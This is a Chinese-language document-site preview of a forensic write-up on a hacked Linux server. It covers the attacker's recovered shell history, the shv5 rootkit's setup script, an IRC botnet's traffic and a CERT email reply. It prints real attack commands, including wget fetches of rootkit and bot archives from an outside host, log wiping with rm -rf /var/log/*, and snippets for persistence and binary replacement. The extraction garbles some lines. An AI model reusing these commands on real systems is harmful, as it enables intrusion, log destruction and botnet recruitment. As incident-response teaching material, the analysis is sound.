一次服務(wù)器被入侵后的分析

上傳人：5*** IP屬地：湖北上傳時(shí)間：2021-11-01 格式：DOCX 頁數(shù)：12 大?。?18.08KB 積分：28 舉報(bào) 版權(quán)申訴

已閱讀5頁，還剩7頁未讀，繼續(xù)免費(fèi)閱讀

版權(quán)說明：本文檔由用戶提供并上傳，收益歸屬內(nèi)容提供方，若內(nèi)容存在侵權(quán)，請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

1、最近有個(gè)朋友讓我去幫他看一下他的Linux服務(wù)器，說是Apache啟動(dòng)不了，有很多詭異的情況。后來證明絕不是Apache啟動(dòng)不了這么簡(jiǎn)單。登上服務(wù)器之后隨便看了下,最先引起我注意的是”ls”命令的輸出：1. larsserver1:$ ls 2. ls: invalid option - h 3. Try ls -help' for more information. 為什么”ls”默認(rèn)加了”-h”參數(shù)呢?我用

2、”alias”命令看了一下,然后取消了這個(gè)別名之后”ls”就工作正常了。1. larsserver1:$ alias ls 2. alias ls='ls -sh -color=auto' 3. larsserver1:$ unalias ls 4. larsserver1:$ ls 5. backup 6. larsserver1

3、:$ 雖然很奇怪,不過我的首要任務(wù)是先把a(bǔ)pache啟動(dòng)起來,等過會(huì)再仔細(xì)研究這個(gè)問題。1. larsserver1:$ sudo /etc/init.d/apache2 start 2. Password: 3. * Starting apache 2.0 web server. 4. (2): apache2: could not open

4、;error log file /var/log/apache2/error.log. 5. Unable to open logs 6. .fail! 納尼?趕緊去”/var/log/”目錄一看,果然”apache2/”文件夾不見了.而且這個(gè)目錄下其他的文件夾,比如”mysql/”,”samba/”也都不見了.一定是哪里出錯(cuò)了.會(huì)不會(huì)是我朋友不小心刪掉了呢,他跟我說絕對(duì)沒有.然后我用root登錄進(jìn)去準(zhǔn)備修復(fù)日志丟失的問題。1. larsserv

5、er1:$ sudo -i 2. Password: 3. rootserver1:# ls 4. ls: unrecognized prefix: do 5. ls: unparsable value for LS_COLORS environment variable 6.

6、60; total 44 7. 4 . 4 .bashrc 4 .ssh 8.

7、; 4 . 4 .lesshst 8 .viminfo 9. 8 .bash_history 4 .pr

8、ofile 4 .vimrc 很不幸的發(fā)現(xiàn),”ls”又出問題了.同樣,用”alias”命令：1. rootserver1:# alias ls 2. alias ls='ls -sa -color=auto' 3. rootserver1:# unalias ls 4. &

9、#160; rootserver1:# ls 5. rootserver1:# 這個(gè)時(shí)候,我才意識(shí)到問題的嚴(yán)重性.”ls”奇怪的舉動(dòng)和”/var/log/”大量日志被刪除讓我懷疑服務(wù)器是否被入侵了.當(dāng)我看到root目錄下的”.bash_history”時(shí),就已經(jīng)可以確定被入侵了。1. rootserver1:# cat -n .bash_history 2. . 3. 340

10、 w 4. 341 cd /var 5. 342 wget 50/matys/pliki/shv5.tar.gz 6. 343 tar -zxf shv5.tar.gz 7. 344 rm -rf shv5.tar.gz&#

11、160;8. 345 mv shv5 .x 9. 346 cd .x 10. 347 ./setup zibi.joe.149 54098 11. 348 passwd 12. 349 passwd 13. &

12、#160; 350 ps aux 14. 351 crontab -l 15. 352 cat /etc/issue 16. 353 cat /etc/passwd 17. 354 w 18. 35

13、5 who 19. 356 cd /usr/lib/libsh 20. 357 ls 21. 358 hide + 22. 359 chmod +x hide 23. 360 hide +

14、 24. 361 ./hide + 25. 362 cd /var/.x 26. 363 mkdir psotnic 27. 364 cd psotnic 28. 365 wget http:/83.19.14

15、8.250/matys/pliki/psotnic0.2.5.tar.gz 29. 366 tar -zxf psotnic0.2.5.tar.gz 30. 367 rm -rf psotnic0.2.5.tar.gz 31. 368 ls 32. 369 mv psotnic

16、-0.2.5-linux-static-ipv6 synscan 33. 370 ./synscan 34. 371 vi conf 35. 372 vi conf1 36. 373 mv synscan smbd 37. 374&

17、#160; smbd -c conf 38. 375 ls 39. 376 ps aux 40. 377 ls 41. 378 ./smbd -c conf 42. 379 ./smbd -

18、c conf1 43. 380 ./smbd conf 44. 381 ./smbd conf1 45. 382 ./smbd -a conf conf1 46. 383 rm -rf conf.dec 47. &

19、#160;384 rm -rf conf1.dec 48. 385 cd /usr/lib/libsh 49. 386 ./hide + 50. 387 exit 51. . 52. 425 ssh ftp62

20、.101.251.166 53. 426 w 54. 427 ls 55. 428 ls 56. 429 cd /var/.x 57. 430 ls 58. 431 cd

21、psotnic/ 59. 432 ls 60. 433 rm -rf /var/log/* 61. 434 exit 62. 435 ls 63. 436 cd /var/.x/psotnic/ 64. &#

22、160; 437 ls 65. 438 vi conf2 66. 439 ./smbd -c conf2 67. 440 ./smbd conf2 68. 441 ./smbd -a conf conf1 conf2

23、 69. 442 rm -rf conf2.dec 70. 443 cd . 71. 444 ls 72. 445 cd /usr/lib/libsh 73. 446 hide + 74.

24、; 447 ./hide + 75. 448 exit 76. 449 ps aux 77. 450 cd /var/.x 78. 451 ls 79. 452 ls 80.

25、 453 cd psotnic/ 81. 454 ls 82. 455 cat pid.MastaH 83. 456 kill -9 2030 84. 457 ./synscan -a conf con

26、f1 85. 458 ./smbd -a conf conf1 86. 459 cd /usr/lib/libsh 87. 460 ./hide + 這個(gè)系統(tǒng)已經(jīng)被入侵了.這實(shí)在是令人激動(dòng)的一件事情,不過很顯然,我的朋友不這么想.這個(gè)入侵者犯了一個(gè)很基本的錯(cuò)誤,沒有清除”.bash_history”文件.所以他/她可能在其他的地方也留

27、下了一些蛛絲馬跡.接下來就是詳細(xì)的分析一下這次入侵。通過bash history我們得到了大量的信息.先來看一下”/var/.x”下面隱藏了什么和命令”setup zibi.joe.149 54098的作用吧。1. rootserver1:/var/.x# file setup 2. setup: Bourne-Again shell script text executable 3. rootserver1:/var/.x# wc -l

28、 setup 4. 825 setup 5. rootserver1:/var/.x# head -17 setup 6. #!/bin/bash 7. # 8. # shv5-internal-release 9. # by: PinTx April/2003 10.

29、# 11. # greetz to: 12. # 13. # * SH-members: BeSo_M, grass, toolman, nobody, niceboy, armando99 14. #

30、60; C00L|0, GolDenLord, Spike, zion . 15. # * Alba-Hack : 2Cool, heka, TheMind, ex-THG members . 16. # * SH-friends: mave, AlexTG, Cat|x, klex, JinkS

31、 . 17. # * tC-members: eksol, termid, hex, keyhook, maher, tripod etc. 18. # * And all others who diserve to be here but i forgot 19. #

32、0;* them at the moment ! 20. # 21. # PRIVATE ! DO NOT DISTRIBUTE *censored*EZ ! “setup”這個(gè)腳本是rootkit shv5的安裝腳本.它安裝了一個(gè)修改過的ssh后門”/bin/ttyload”,然后把它加到了”/etc/inittab”,這樣每次重啟后就會(huì)自動(dòng)啟動(dòng).(相關(guān)部分的腳本如下:)1. mv $S

33、SHDIR/sshd /sbin/ttyload 2. chmod a+xr /sbin/ttyload 3. chmod o-w /sbin/ttyload 4. touch -acmr /bin/ls /sbin/ttyload 5. chattr +isa /sbin/ttyload 6.

34、0; kill -9 pidof ttyload >/dev/null 2>&1 7. . 8. # INITTAB SHUFFLING 9. chattr -isa /etc/inittab 10. cat /etc/inittab |grep -v&

35、#160;ttyload|grep -v getty > /tmp/.init1 11. cat /etc/inittab |grep getty > /tmp/.init2 12. echo "# Loading standard ttys" >> /tmp/.init1 13.

36、0; echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1 它也替換了一些linux的標(biāo)準(zhǔn)命令。1. # Backdoor ps/top/du/ls/netstat/etc. 2. cd $BASEDIR/bin 3. BACKUP=/usr/lib/libsh/.backup 4. mkdir&#

37、160;$BACKUP 5. . 6. # ls . 7. chattr -isa /bin/ls 8. cp /bin/ls $BACKUP 9. mv -f ls /bin/ls 10. chattr +isa

38、;/bin/ls 這樣子就可以解釋為什么”ls”命令輸出那么奇怪了?！?backup”文件夾保存了被替換之前的命令程序。1. rootserver1:/var/.x# ls -l /usr/lib/libsh/.backup/ 2. total 552 3. -rwxr-xr-x 1 root root &#

39、160;126276 Dec 24 22:58 find 4. -rwxr-xr-x 1 root root 59012 Dec 24 22:58 ifconfig 5. -rwxr-xr-x 1 root

40、60; root 77832 Dec 24 22:58 ls 6. -rwxr-xr-x 1 root root 30388 Dec 24 22:58

41、;md5sum 7. -rwxr-xr-x 1 root root 99456 Dec 24 22:58 netstat 8. -rwxr-xr-x 1 root root

42、; 65492 Dec 24 22:58 ps 9. -rwxr-xr-x 1 root root 14016 Dec 24 22:58 pstree 10. -rwxr-xr-x

43、60; 1 root root 50180 Dec 24 22:58 top 看了一下時(shí)間戳,居然是在圣誕節(jié)。很顯然,原始的”ls”和后門安裝的”ls”是不一樣的.他們的md5對(duì)比如下：1. rootserver1:# md5sum /usr/lib/libsh/.backup/ls /bin/ls 2. eef7ca9dd

44、6be1cc53bac84012f8d1675 /usr/lib/libsh/.backup/ls 3. 0a07cf554c1a74ad974416f60916b78d /bin/ls 4. 5. rootserver1:# file /bin/ls 6. /bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),

45、 for GNU/Linux 2.0.0, dynamically linked 7. (uses shared libs), for GNU/Linux 2.0.0, stripped 8. 9. rootserver1:# file /usr/lib/libsh/.backup/ls 10. /usr/lib/libsh/.backup/ls: ELF 32-bit LSB

46、60;executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.0, dynamically linked 11. (uses shared libs), for GNU/Linux 2.6.0, stripped 這個(gè)rootkit(“sh5.tar.gz”)是從下面的地址下載的。1. rootserver1:# dig +shor

47、t -x 50 2. 4lo.bydg.pl. 這是一個(gè)波蘭的ip,從這個(gè)ip上沒有得到更多的信息.不過這個(gè)入侵者依然犯了幾個(gè)嚴(yán)重的錯(cuò)誤.這是運(yùn)行”setup”命令的截圖:(在服務(wù)器上的沙盒里運(yùn)行的)所以”zibi.joe.149是后門的密碼,”54098是端口號(hào).這是一個(gè)來自的就版本的sshd.測(cè)試截圖如下：安裝完后門之后,下一個(gè)步驟就是裝一個(gè)irc-bot,讓服務(wù)器變成僵尸網(wǎng)絡(luò)中的一員.”psotnic0.2.5.tar.gz”就是來達(dá)到這個(gè)目的的.入侵者解壓這個(gè)包之后把 irc-bot重命名

48、為”smbd”,來達(dá)到隱藏的目的。然后,他創(chuàng)建了兩個(gè)配置文件.文件中包含irc服務(wù)器和需要加入的頻道.配置文件是加密過的,而且明文的配置文件被刪掉了。1. vi conf 2. vi conf1 3. . 4. ./smbd -c conf 5. ./smbd -c conf1 6. ./smbd conf 7. ./smbd conf1 8. ./smbd -a conf conf1 讓我們執(zhí)行一下382

50、160;4. + Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1 5. + Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf1

51、60;>/dev/null 2>&1 6. + Added 2 psotnics to cron 哇!它添加了cron定時(shí)任務(wù).趕緊看一看：1. rootserver1:/var/.x/psotnic# crontab -l 2. */10 * * * * cd /var/.x/psotnic; ./smbd con

52、f >/dev/null 2>&1 3. */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1 接下來,我殺掉這兩個(gè)惡意的smbd進(jìn)程,禁用cron任務(wù).在另一個(gè)shell中運(yùn)行了tcpdump,然后手動(dòng)啟動(dòng)了這兩個(gè)irc-bot進(jìn)程：1. rootserver1:# cd /var/.x/p

54、 Acting as LEAF 7. + Config loaded 8. + Going into background pid: 5724 9. rootserver1:/var/.x/psotnic# ./smbd conf1 10. 11. Psotnic

56、aded 16. + Going into background pid: 5727 17. rootserver1:/var/.x/psotnic# 用”ps”命令(后門替換過的)可以看到這兩個(gè)進(jìn)程.這也是為什么入侵者需要通過改名字來隱藏進(jìn)程。1. rootserver1:/var/.x/psotnic# ps axuw | grep smb 2.

57、;root 3799 0.0 0.4 8592 2156 ? S 11:00 0:00 /usr/sbin/smbd -D 3. root

58、60;3808 0.0 0.1 8592 896 ? S 11:00 0:00 /usr/sbin/smbd -D 4. root 5724 0.0

59、;0.1 1648 772 pts/2 S 12:47 0:00 ./smbd conf 5. root 5727 0.0 0.1 1640 764 pts/2 &

60、#160; S 12:47 0:00 ./smbd conf1 最開始兩個(gè)是真正的samba進(jìn)程,后面兩個(gè)是irc-bot,讓我們用”strace”命令來看看它做了什么：1. rootserver1:# strace -p 5727 2. . 3. connect(3, sa_family=AF_INET, sin_port=htons

61、(9714), sin_addr=inet_addr("35"), 16) = -1 EINPROGRESS (Operation now in progress) 4. . 5. connect(4, sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("195.15

62、9.0.92"), 16) = -1 EINPROGRESS (Operation now in progress) 可以看到它嘗試連接ip 35的9714端口和2的6667端口：1. rootserver1:# dig +short -x 35 2. manhattan.na.pl. 3. rootse

63、rver1:# dig +short -x 2 4. ircnet.irc.powertech.no. 又是一個(gè)波蘭的ip.另外一個(gè)ip,”ircnet.irc.powertech.no”是”irc.powertech.nof”的別名.是挪威一個(gè)著名的irc服務(wù)器。tcpdump抓到了連接irc服務(wù)器的流量.正如下面的內(nèi)容顯示,它連接到了”irc.powertech.no”,加入了”#aik”頻道。 1. :irc.powertech.no 001

64、;578PAB9NB :Welcome to the Internet Relay Network 578PAB9NB!opti231210a080-3666.bb.online.no 2. :irc.powertech.no 002 578PAB9NB :Your host is irc.powertech.no, running version 2.11.1p1 3

65、. 4. :578PAB9NB!opti231210a080-3666.bb.online.no JOIN :#aik 5. :irc.powertech.no 353 578PAB9NB #aik :578PAB9NB kknd raider brandyz jpi conf xerkoz IpaL vvo

66、0;6. :irc.powertech.no 366 578PAB9NB #aik :End of NAMES list. 7. :irc.powertech.no 352 578PAB9NB #aik op ti231210a080-3666.bb.online.no irc.powertech.no 578PAB9NB G :0

67、 op - GTW 8. :irc.powertech.no 352 578PAB9NB #aik kknd ti231210a080-3666.bb.online.no irc.hitos.no kknd H :2 kknd - GTW 9. :irc.powertech.no 352 578PAB9NB

68、60;#aik raider mobitech-70.max-bc.spb.ru *. raider G :4 raider - GTW 10. :irc.powertech.no 352 578PAB9NB #aik brandyz mobitech-70.max-bc.spb.ru *. brandyz G :4&#

69、160;brandyz - GTW 11. :irc.powertech.no 352 578PAB9NB #aik jpi p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp jpi G :8 jpi - GTW 12. :irc.powertech.no 352 578PAB9NB&#

70、160;#aik conf p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp conf G :7 conf - GTW 13. :irc.powertech.no 352 578PAB9NB #aik xerkoz p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp xerkoz H :7&

71、#160;xerkoz - GTW 14. :irc.powertech.no 352 578PAB9NB #aik lm campus19.panorama.sth.ac.at *.at IpaL H :5 .LaPi.9.IRCNet. 15. :irc.powertech.no 352 578PAB9NB #aik

72、vvo elcom.sm *.tiscali.it vvo H :6 vvo - GTW 16. :irc.powertech.no 315 578PAB9NB #aik :End of WHO list. 17. 18. 這些僅僅是加入#aik頻道,并開始監(jiān)聽該頻道所有成員的一些原始網(wǎng)絡(luò)流量.我決定自己進(jìn)入這個(gè)頻道看看.令我驚訝的是

73、不需要任何密碼我就進(jìn)來了. 19. 20. 17:43 -!- viper42 has joined #aik 21. 17:43 Users #aik 22. 17:43 578PAB9NL conf j

74、pi raider vvo 23. 17:43 brandyz IpaL kknd viper42 xerkoz 24. 17:43 -!- Irssi: #aik: Total of

75、10 nicks 0 ops, 0 halfops, 0 voices, 10 normal 25. 17:43 -!- Irssi: Join to #aik was synced in 1 secs 我發(fā)現(xiàn)我朋友的服務(wù)器使用的昵稱是”578PQB9NB”,還有一些其他的服務(wù)器也在這里.這些僵尸服務(wù)器應(yīng)該是正在等待著我們的入侵者加入頻道發(fā)

76、布命令.或者他已經(jīng)潛藏在這里了.我注意到,所有的昵稱都有一個(gè)后綴”*-GTW”,只有一個(gè)沒有：1. 17:45 powertech -!- IpaL lmcampus19.panorama.sth.ac.at 2. 17:45 powertech -!- ircname : LaPiIRCNet 3. 17:45 powertech -!- channels : #relaks #ping&

77、#160;#seks #aik #ogame.pl 4. #pingwinaria #hattrick #trade #admin #!sh 5. 17:45 powertech -!- server : *.at o o/ /o/ 這是唯一一個(gè)加入了多個(gè)頻道的昵稱.我猜我已經(jīng)找到這個(gè)入侵者了,除

78、非這是一個(gè)故意迷惑的誘餌.(恩,這個(gè)入侵者真的真么笨!這么容易就找到了!?).我決定等幾天看看有木有什么有趣的事情發(fā)生.這個(gè)域名解析到了：1. $ dig +short campus19.panorama.sth.ac.at 2. 4 根據(jù)RIPE的數(shù)據(jù),這個(gè)ip屬于Vienna University計(jì)算機(jī)中心,我發(fā)了一封郵件詢問關(guān)于這個(gè)域名的信息,他們幾個(gè)小時(shí)后會(huì)我了:1. From: Alexander Talos via RT 2

79、. To: larstraifi.uio.no 3. Subject: Cracker at campus19.panorama.sth.ac.at (4) ACOnet CERT #38603 4. Date: Fri, 18 May 2007 18:22:43 +0200 (CES

80、T) 5. Reply-To: cert 6. 7. -BEGIN PGP SIGNED MESSAGE- 8. Hash: SHA1 9. 10. Hej! 11. 12. On Fri May 18 14

81、:45:03 2007, larstraifi.uio.no wrote: 13. 14. > I have been tracking down cracker which connected from 15. > campus19.panorama.sth.ac.at (4). The

82、0;user, which 16. 17. Ouch. panorama.sth.ac.at is a dormitory with about 4k rooms all 18. behind a NAT gateway - it will be very hard to

83、get hold of the 19. miscreant. 20. 21. This incident will, in the long run, definitely help me getting 22. rid of the NAT boxes i

84、n setups like that, but right now, we will 23. have to make do with what we have. 24. 25. > Please investigate the host in question.&#

85、160;Perhaps is this a 26. > compromised host on your network acting as a jumpstation for 27. 28. Sure, and even in a NATed environment, thi

86、s is still possible. 29. 30. Btw, you did a great job in analysing the compromised machine! 31. 32. I'll let you know when I have either further questions or any 33. interesting results. 34. 35. Cheers, 36. 37. Alexander Talos 38. &#

人人文庫> 全部分類> 教育資料 > 課件下載

溫馨提示

1. 本站所有資源如無特殊說明，都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
2. 本站的文檔不包含任何第三方提供的附件圖紙等，如果需要附件，請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
3. 本站RAR壓縮包中若帶圖紙，網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽，若沒有圖紙預(yù)覽就沒有圖紙。
4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間，僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理，對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯，并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容，請(qǐng)與我們聯(lián)系，我們立即糾正。
7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

一次服務(wù)器被入侵后的分析

文檔簡(jiǎn)介

溫馨提示

最新文檔

評(píng)論

一次服務(wù)器被入侵后的分析

文檔簡(jiǎn)介

溫馨提示

最新文檔

評(píng)論

相關(guān)文檔